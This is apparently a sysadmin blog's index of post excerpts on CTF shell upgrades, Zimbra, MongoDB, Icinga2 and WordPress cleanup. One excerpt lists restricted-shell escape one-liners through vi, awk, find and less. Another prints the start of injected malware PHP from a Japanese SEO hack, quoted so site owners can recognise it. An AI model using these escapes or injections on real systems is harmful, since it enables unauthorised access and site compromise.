In ctf after you get a shell you may want to see if you can upgrade to a full tty shell. You can find many ippsec videos on youtube doing this. First see if there is python or not $ which python If it is available, type following command to get bash shell. There is […]
Escaping Restricted Linux Shells
From vi or vim :set shell=/bin/bash Next, type and execute: :shell Another method is to type: :! /bin/bash From awk awk ‘BEGIN {system(“/bin/sh”)}’ From find find / -name blahblah -exec /bin/awk ‘BEGIN {system(“/bin/sh”)}’ \; From more, less and man ‘! /bin/sh’ ‘!/bin/sh’ ‘!bash’ From tee echo “evil script code” | tee script.sh From your fav […]
Install CAPTCHA in your website
Why? Well, to answer this quickly and as short as possible, it is to stop spam. First of all, you may want to know what is CAPTCHA and what is it stand for? The full form of CAPTCHA is a Completely Automated Public Turing test to tell Computers and Humans Apart. It is a type […]
Renew letsencrypt of Zimbra server
After installing Letsencrypt SSL according to https://wiki.zimbra.com/wiki/Installing_a_LetsEncrypt_SSL_Certificate article you need to renew certificate later. To renew certificate you can do following: Login to server as root $ letsencrypt renew Change directory to Zimbra Letsecnrpyt SSL folder # cd /opt/zimbra/ssl/letsencrypt/ Copy new SSL files to Zimbra Letsencrypt folder then change owner to Zimbra. # cp /etc/letsencrypt/live/yourdomain.com/* […]
How to restore hacked WordPress website? v2
BACKUP!! BACKUP!! BACKUP!! Make sure you do backup regularly or at least ask your clients’ to take a clean backup of website. Change Password After your website gets hacked, first thing to do is to make sure that you change passwords ie: cpanel, database, wp-admin, etc Replace Files/Folders 1. Rename public_html folder to something else […]
Add user and database in mongodb
To create database and user and grant readwrite access you can use following: $ mongo > use admin > db.auth(“admin”, “password”) > use database > db.createUser( { user: “user”, pwd: “userpassword”, roles: [ “readWrite”, “database” ] } )
Japanese seo hack WordPress
Ever encountered php unknown code injected at top of your index.php file? I have same issue in my WordPress website where some unknown php scripts was injected at top of index.php file. Below is the sample of that php code: <?php @set_time_limit(3600); @ignore_user_abort(1); $xmlname = ‘mapss271.xml’; $jdir = ”; $smuri_tmp = smrequest_uri(); if($smuri_tmp==”){ $smuri_tmp=’/’; } […]
How to monitor Linux servers in icinga2?
This is third part. Previously, we have installed icinga2 and icingaweb2. Now, we are going to monitor basic services of Linux server. I assume you have followed how to install icinga2 and how to install icingaweb2 post. master server ip: 127.0.0.1 master server hostname: master.server.com client server ip: 0.0.0.0 client server hostname: client.server.com In master […]
How to install icingaweb2 in centos?
This post will show how to install icingaweb2 in centos server. This is second part. First part was about how to install icinga2 in centos server. We are going to install icingaweb2 using mysql, therefore I assume we have already installed mysql. If not, then please install mysql first. Installing the IDO modules for MySQL […]
How to install icinga2 in centos?
This post will show how to install icinga2 in centos linux server to monitor different servers. Icinga 2 is an open source monitoring system which checks the availability of your network resources, notifies users of outages, and generates performance data for reporting. Add Icinga repository RHEL/CentOS 7 # yum install https://packages.icinga.com/epel/icinga-rpm-release-7-latest.noarch.rpm RHEL/CentOS 6 # yum […]